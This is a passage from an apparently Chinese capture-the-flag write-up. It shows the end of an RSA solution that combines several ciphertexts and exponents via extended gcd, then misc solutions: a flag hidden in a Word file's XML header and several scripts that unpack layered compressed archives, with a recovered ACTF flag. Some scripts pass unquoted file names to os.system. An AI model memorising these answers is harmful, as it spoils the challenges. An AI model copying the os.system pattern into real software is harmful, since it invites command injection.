e2 = 7981110843177277522743262582712207767500318326009118362192817529414323700650435360291001887232564132664914694220334201133850645107707193720930288877874115700468049318771691746592219604611120450612600603061311788240065247605723819417162805390035814213048743243801428908542140081097421519822132590047533
c2 = 12907231513900923422005862146378905589636791955213455533815625546155661275692081099543894853443339737652933422555561840945917851059973294781475696342510739464313686827430856742266071924616860913810640580296234473777303348248031669837803543965896443694327322478656672147536068477193332582821244877632320706358476947499828283809012293724747791713411303065091158644428874828519807586496004634361827049528190857803358038226873772036022804215684911051370929474550764142943510840488678370689581686370179457811111602201500802245275266633124851078915997894235280935026230159846619929979668248511374747926732890795947582868735
e3 = 8321945773137532897701269832287423438330975369722946793416731752574708023263908693097168458920645511451157398450278461406044452962800707032660103849647429968263806321843635237930345258217128805872313308435747131438472827261934005675575066641207582827978944766548998867180054428477087525524476746729443
c3 = 14065425026445215199826296511184881258323064633386950509660192854866326626040354040592178906620984652169865998063876885421774133239148395916412178848784041317916589243316140373118461629430419305769180856968279675982734449182890302977853892881391084830333333875116598959777525928574769839174695101654696531535920235825780434207646161363349309470260223615977113109458426965856166705879375711518022880712089324008258280991081209228374850515248942548172463741894540420262751207821783524890116559086561517224038086473047623408064157594299815732082781632190258405091440187576055868450259807171733509904666142689629066721239
y1,x1,x2=gcdext(e1,e2)
s,t1,x3=gcdext(y1,e3)
print(s)
m=pow(c1,x1*t1,n)*pow(c2,x2*t1,n)*pow(c3,x3,n)%n
print(bytes.fromhex(hex(m)[2:]))

misc

隐秘的角落

  • 思路

拿到一个word,看起来都是正常的,给了一堆假的flag,用zip打开在,word–>header3.xml中发现了flag

神秘的压缩包

  • 思路

循环解压脚本需要修改

exp1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
import zstandard
import pathlib
import gzip
import bz2
import lzma
import py7zr

count = 1
extra_outputfile = "compress/flag" + str(count)
outputfile = "compress/flag" + str(count + 1)

def decompress_lzma_to_folder(input_file):
with open(outputfile, 'wb') as f:
print("lzma:" + outputfile)
f.write(lzma.open(input_file).read())


def decompress_zstandard_to_folder(input_file):
input_file = pathlib.Path(input_file)
with open(input_file, 'rb') as compressed:
decomp = zstandard.ZstdDecompressor()
print("zst:" + outputfile)
with open(outputfile, 'wb') as destination:
decomp.copy_stream(compressed, destination)


def decompress_gzip_to_folder(input_file):
with gzip.open(input_file, 'rb') as f_in:
with open(outputfile, 'wb') as f:
print("lzma:" + outputfile)
f.write(f_in.read())


def decompress_bzip_to_folder(input_file):
with open(input_file, 'rb') as f_in:
with open(outputfile, 'wb') as f:
print("bzip:" + outputfile)
f.write(bz2.decompress(f_in.read()))

def decompress_7zip_to_folder(input_file):
with open(input_file, 'rb') as f_in:
with open(outputfile, 'wb') as f:
print("7zip:" + outputfile)
with py7zr.SevenZipFile(input_file, mode='r') as z:
z.extractall(outputfile)



while True:
with open(extra_outputfile, 'rb') as f:
data = f.read()
print(data[0:4])
if data[0:4] == b"(\xb5/\xfd":
decompress_zstandard_to_folder(extra_outputfile)
elif data[0:4] == b'\x1f\x8b\x08\x08':
decompress_gzip_to_folder(extra_outputfile)
elif data[0:4] == b'\xfd7zX' or data[0:4] == b']\x00\x00\x80':
decompress_lzma_to_folder(extra_outputfile)
elif data[0:4] == b'BZh9':
decompress_bzip_to_folder(extra_outputfile)
elif data[0:4] == b'\x37\x7a\xbc\xaf':
decompress_7zip_to_folder(extra_outputfile)

else:
break
extra_outputfile = outputfile
print("extra:" + extra_outputfile)
count = count + 1
outputfile = "compress/flag" + str(count + 1)
print("now:" + outputfile)

# ACTF{r0cK_4Nd_rolL_1n_C0mpr33s1ng_aNd_uNCOmrEs5iNg}
exp2
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
import os
import random
import subprocess

input_file = 'flag'

def get_compressed_type(filepath: str) -> str:
# use file command
cmd = ['file', filepath]
file_cmd_output = subprocess.run(cmd, stdout=subprocess.PIPE).stdout.decode().strip()
if 'gzip compressed data' in file_cmd_output:
return 'gzip'

if 'XZ compressed data' in file_cmd_output:
return 'xz'

if 'bzip2 compressed data' in file_cmd_output:
return 'bzip2'

if 'LZMA compressed data' in file_cmd_output:
return 'lzma'

if 'Zstandard compressed data' in file_cmd_output:
return 'zstd'

return ''

while True:
ctype = get_compressed_type(input_file)
if ctype == "gzip":
tmp_file = input_file + ".gz"
cmd = "mv {} {}; gunzip {}".format(input_file, tmp_file, tmp_file)
elif ctype == "xz":
tmp_file = input_file + ".xz"
cmd = "mv {} {}; unxz {}".format(input_file, tmp_file, tmp_file)
elif ctype == "bzip2":
tmp_file = input_file + ".bz2"
cmd = "mv {} {}; bunzip2 {}".format(input_file, tmp_file, tmp_file)
elif ctype == "lzma":
tmp_file = input_file + ".lzma"
cmd = "mv {} {}; unlzma {}".format(input_file, tmp_file, tmp_file)
elif ctype == "zstd":
tmp_file = input_file + ".zst"
cmd = "mv {} {}; unzstd --force {}".format(input_file, tmp_file, tmp_file)
else:
print("done")
break
os.system(cmd)
exp3
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
import os
import random

input_file = 'flag'
random_list = [
'gzip',
'xz',
'bzip2',
'lzma',
'zstd'
]

random_choices = []
for i in range(16):
random_choices.append(random.randint(0, len(random_list) - 1))

for choice in random_choices:
if choice == 0:
# gzip2
out_file = 'flag.gz'
cmd = 'gzip flag'

if choice == 1:
# xz
out_file = 'flag.xz'
cmd = 'xz flag'

if choice == 2:
out_file = 'flag.bz2'
cmd = 'bzip2 flag'

if choice == 3:
# lzma
out_file = 'flag.lzma'
cmd = 'lzma flag'

if choice == 4:
# lzma
out_file = 'flag.zst'
cmd = 'zstd -f flag'

os.system(cmd)
os.system('mv {} {}'.format(out_file, input_file))

print("done")
print("choices:", random_choices)
# choices: [2, 3, 3, 3, 1, 2, 1, 1, 1, 2, 0, 1, 2, 3, 3, 4]
exp4
1
2
3
4
5
6
import os
index = 750
while True:
newfile = os.listdir(f"D:\\aaa\\202209\\1\\{index-1}")[-1]
os.system(f"\"D:\\Program Files\\7-Zip\\7z.exe\" x D:\\aaa\\202209\\1\\{index-1}\\{newfile} -oD:\\aaa\\202209\\1\\{index} -aoa")
index +=1
exp5
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
import filetype
import bz2
import os
import gzip
import tarfile
import py7zr
import zipfile
import lzma

while True:
kind = filetype.guess("new")
print(kind.extension)

if kind.extension == "bz2":
bz2file = bz2.BZ2File("new") # open the file
data = bz2file.read() # get the decompressed data
open("new", 'wb').write(data) # write a uncompressed file
elif kind.extension == "gz":
input = gzip.GzipFile("new", 'rb')
s = input.read()
input.close()
output = open("new", 'wb')
output.write(s)
output.close()
elif kind.extension == "zip":
file = zipfile.ZipFile("new", 'r')
file.extractall(".")
f = open("flag", "rb").read()
new = open("new", "wb").write(f)
elif kind.extension == "xz":
f = lzma.open("new", 'rb').read()
open("new", "wb").write(f)